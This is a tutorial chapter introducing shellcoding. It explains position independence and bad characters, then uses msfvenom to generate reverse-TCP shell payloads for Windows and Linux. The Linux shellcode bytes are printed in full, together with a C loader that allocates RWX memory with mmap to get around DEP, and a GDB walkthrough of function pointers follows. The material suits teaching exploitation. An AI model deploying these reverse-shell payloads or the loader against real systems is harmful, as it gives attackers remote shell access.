14. Introduction to Shellcoding
Shellcoding is the art of writing compact, position-independent machine code that can be injected into and executed inside another process. At its core, shellcode is pure machine code: raw bytes, usually written in hexadecimal, that the CPU executes directly. It’s not a high-level language; there’s no compiler to hold your hand. The name is a bit of a misnomer: it historically referred to code that spawned a shell (like /bin/sh), but it’s now a general term for the payload in an exploit, which could do anything: open a reverse shell, add a user, or just call a specific API.
This section explains what shellcode is, why it matters, and how to write effective shellcode.
The key challenges are:
- It must be self-contained. No linking to external libraries.
- It must be position-independent. It doesn’t know where in memory it will live.
- It must avoid certain bytes (bad characters). No null bytes (0x00), which would terminate a string copy, and often no newlines (0x0a) or carriage returns (0x0d).
Does size matter?
Yes — and not just historically. Payloads used to have very tight size limits, and even today smaller payloads are easier to hide and more portable. Rather than calling library functions, shellcode typically invokes syscalls (the kernel interface) directly.
Before starting, I highly encourage you to complete the previous posts on x86-64 assembly.
Shellcode vs. Payload: What’s the Real Difference?
If you’re diving into the world of exploitation, you’ve likely heard the terms “shellcode” and “payload” used, sometimes even interchangeably. While they are closely related, they are not the same thing.
The Analogy: A Military Operation
Think of a cyber attack like a special forces operation:
- The Payload is the entire mission package. It’s the overall objective: “Infiltrate the enemy base, plant a listening device in the commander’s office, and exfiltrate undetected.” The payload defines the what and the why.
- The Shellcode is the highly trained commando team itself. They are the self-contained, executable component that carries out the core, technical task. They are the how.
Example: A Metasploit Payload
When you use msfvenom in Metasploit, you are generating a complete payload. For example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > malicious.exe
This payload (malicious.exe) contains:
- The shellcode responsible for creating the reverse TCP connection.
- A decoder stub to decode the shellcode if encoding was used.
- All the necessary configuration data (IP, port).
- Wrapped in an executable format.
Let’s generate Linux shellcode using msfvenom and try to execute it using C. msfvenom is a command-line utility that comes with the Metasploit Framework.
We’ll start with a simple Linux x64 payload that creates a reverse TCP shell. This is one of the most common payloads: it connects back to our machine and gives us a shell.
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 338 bytes
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";
Now we need a way to execute this raw machine code. We’ll create a simple C program that places our shellcode in memory and jumps to it.
Let’s create a C file shellcode_loader.c
#include <stdio.h>
#include <string.h>
// Our msfvenom-generated shellcode
unsigned char code[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";
int main() {
    // sizeof counts the string literal's trailing NUL, so subtract 1.
    // strlen() would stop at the first 0x00 inside the shellcode and report 17.
    printf("Shellcode Length: %zu bytes\n", sizeof(code) - 1);
    // Cast the shellcode array to a function pointer and execute
    int (*ret)() = (int(*)())code;
    printf("Starting execution...\n");
    ret();
    // This line will only be reached if the shellcode fails
    printf("Shellcode execution completed (or failed)\n");
    return 0;
}
This compiles, but when we run it on a modern system it will most likely crash with a segmentation fault.
By default, modern systems have security protections that prevent code from running out of the data section, where our shellcode array lives. Modern systems enforce Data Execution Prevention (DEP), or a W^X (Write XOR Execute) policy:
- Memory pages can be either writable OR executable, but not both
- This prevents attackers from injecting and executing code
To get around this, we need to allocate executable memory ourselves using mmap. You can learn more about mmap in my System Programming Series.
void *exec_mem = mmap(NULL, sizeof(code),
PROT_READ | PROT_WRITE | PROT_EXEC, // ← Explicitly requesting EXECUTE permission
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
Using mmap, we allocate a new memory region and explicitly set its permissions to RWX (read, write, execute). The shellcode is copied into this region, and the CPU can then execute instructions from it.
Let’s try to implement this behaviour.
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
// Our msfvenom-generated shellcode
unsigned char code[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05"; // Stored in data section (RW-)
int main() {
    // sizeof counts the string literal's trailing NUL, so subtract 1.
    // strlen() would stop at the first 0x00 inside the shellcode and report 17.
    printf("Shellcode Length: %zu bytes\n", sizeof(code) - 1);
    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(code),
                          PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
    printf("Allocated executable memory at: %p\n", exec_mem);
    // Copy shellcode to executable memory
    memcpy(exec_mem, code, sizeof(code));
    printf("Executing shellcode...\n");
    /* PROBLEM */
    // int (*ret)() = (int(*)())code; // Trying to execute data section
    // ret();
    // Cast to function pointer and execute
    int (*func)() = (int(*)())exec_mem;
    func();
    // Cleanup (though we may not reach this)
    munmap(exec_mem, sizeof(code));
    return 0;
}
Let’s review the memory layout once again:
[Text Section] - EXECUTE permission (your main() code)
[Data Section] - READ/WRITE permission (your shellcode array)
[Stack] - READ/WRITE permission
[Heap] - READ/WRITE permission
If you’re feeling overwhelmed by this line:
int (*ret)() = (int(*)())code;
ret();
You’re not alone! This syntax might look intimidating at first, but it’s actually quite logical once we break it down.
Think of your shellcode bytes:
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f..."
These aren’t just random numbers! Each byte, or short group of bytes, encodes a CPU instruction that the processor understands directly:
- \x6a\x29 = push 0x29
- \x58 = pop rax
- \x99 = cdq (sign-extends EAX into EDX, which clears RDX here)
- \x6a\x02 = push 0x2
- \x5f = pop rdi
- etc.
To see the complete picture, you can use an online disassembler like Defuse.ca’s Online X86 Assembler and paste your shellcode as a hex string.
First, generate the shellcode in hex format:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f hex
#...
6a2958996a025f6a015e0f05489748b90200115c7f000001514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05
Paste this into the disassembler, and you’ll see the human-readable assembly instructions:
Disassembly:
0: 6a 29 push 0x29
2: 58 pop rax
3: 99 cdq
4: 6a 02 push 0x2
6: 5f pop rdi
This visualization makes it clear: your shellcode is literally a mini-program written directly in machine language, just waiting to be executed!
Let’s look at a bit of C that we already know.
#include <stdio.h>
void hello() {
    printf("Hello World!\n");
}
int main() {
    hello(); // Call the function
}
The function hello() is at some memory address. Calling hello() jumps to that address and executes.
What is a Function Pointer?
#include <stdio.h>
void hello() {
    printf("Hello World!\n");
}
int main() {
    void (*func_ptr)() = hello; // func_ptr points to hello's address
    func_ptr(); // Calls hello via the pointer
}
func_ptr is a variable that holds a memory address. That address points to executable code, and calling func_ptr() jumps to that address and executes the code there.
Let’s break this line down:
int (*ret)() = (int(*)())code;
We are declaring ret, a pointer to a function. The function returns int, and the empty parentheses () leave its arguments unspecified (in C before C23).
(int(*)())code
- This is a cast that says: “Treat code as a function pointer”
- (int(*)()) means “pointer to function returning int”
- We’re telling the compiler: “I know code is a byte array, but trust me, it’s actually machine code”
Simplified version -
// Before cast: code is an array of bytes
unsigned char code[] = {0x6a, 0x29, 0x58, ...};
// After cast: ret points to the SAME memory, but we're telling
// the compiler it contains executable code
int (*ret)() = (int(*)())code;
// This generates: call [address of code]
ret();
Sometimes, the best way to understand a concept is to see it working at the lowest level. Let’s debug our function pointer example using GDB to see what’s really happening behind the scenes.
#include <stdio.h>
void hello() {
    printf("Hello World!\n");
}
int main() {
    void (*func_ptr)() = hello; // func_ptr points to hello's address
    func_ptr(); // Calls hello via the pointer
}
$ gcc -o func_ptr func_ptr.c
$ gdb ./func_ptr
pwndbg> start
#...
pwndbg> disass main
Dump of assembler code for function main:
0x0000555555555163 <+0>: endbr64
0x0000555555555167 <+4>: push rbp
0x0000555555555168 <+5>: mov rbp,rsp
=> 0x000055555555516b <+8>: sub rsp,0x10
0x000055555555516f <+12>: lea rax,[rip+0xffffffffffffffd3] # 0x555555555149 <hello>
0x0000555555555176 <+19>: mov QWORD PTR [rbp-0x8],rax
0x000055555555517a <+23>: mov rdx,QWORD PTR [rbp-0x8]
0x000055555555517e <+27>: mov eax,0x0
0x0000555555555183 <+32>: call rdx
0x0000555555555185 <+34>: mov eax,0x0
0x000055555555518a <+39>: leave
0x000055555555518b <+40>: ret
End of assembler dump.
Let’s step to the point where the function pointer is called:
pwndbg> nextcall
#...
pwndbg> disass
Dump of assembler code for function main:
0x0000555555555163 <+0>: endbr64
0x0000555555555167 <+4>: push rbp
0x0000555555555168 <+5>: mov rbp,rsp
0x000055555555516b <+8>: sub rsp,0x10
0x000055555555516f <+12>: lea rax,[rip+0xffffffffffffffd3] # 0x555555555149 <hello>
0x0000555555555176 <+19>: mov QWORD PTR [rbp-0x8],rax
0x000055555555517a <+23>: mov rdx,QWORD PTR [rbp-0x8]
0x000055555555517e <+27>: mov eax,0x0
=> 0x0000555555555183 <+32>: call rdx
0x0000555555555185 <+34>: mov eax,0x0
0x000055555555518a <+39>: leave
0x000055555555518b <+40>: ret
If you print the address of the hello function, you’ll find it is exactly the same as the address stored in rdx.
pwndbg> p hello
$1 = {<text variable, no debug info>} 0x555555555149 <hello>
pwndbg> reg rdx
*RDX 0x555555555149 (hello) ◂— endbr64
I hope this makes things clear for you now.
In the next part, we will take a deep dive into syscalls.